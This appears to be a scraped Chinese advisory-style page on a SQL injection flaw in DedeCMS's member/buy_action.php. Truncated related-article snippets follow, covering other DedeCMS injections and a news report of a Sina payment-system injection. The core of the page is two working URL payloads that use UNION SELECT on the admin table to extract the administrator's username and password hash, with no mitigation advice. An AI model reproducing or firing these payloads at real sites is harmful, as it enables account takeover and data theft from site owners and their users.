影響版本:dodecms.
官方**:
漏洞型別:sql注入
漏洞描述:dedecms. 織夢buy_action.php存在注入,可利用sql查詢**爆管理員使用者密碼。
漏洞測試:
爆管理帳號:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
爆管理員密碼
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
dedecms會員註冊注入漏洞
一 首先訪問 data admin ver.txt 頁面獲取系統最後公升級時間,判斷是否是dede的cms 以及看看是否和這個漏洞相對應 二 然後訪問 member ajax membergroup.php?action post membergroup 1 頁面 看是否可注入 三 爆使用者 mem...
Dedecms會員中心注入漏洞
詳細說明 member buy action.php require once dirname file config.php checkrank 0,0 menutype mydede menutype son op require once dedeinc.dedetemplate.class....
新浪支付系統出現SQL注入漏洞
9月15日凌晨,烏雲平台漏洞作者 豬豬俠 報告了新浪支付系統出現了sql注入漏洞,當天新浪支付部門已確認該漏洞。9月初,黑客就通過sql注入漏洞,入侵了乙個名為 中國校花大賽 的 可以輕易拿到全國大批高校418名 校花 的手機號碼 qq 郵箱 身份證等資訊。此前杭州某快遞 因為該漏洞遭黑客入侵,14...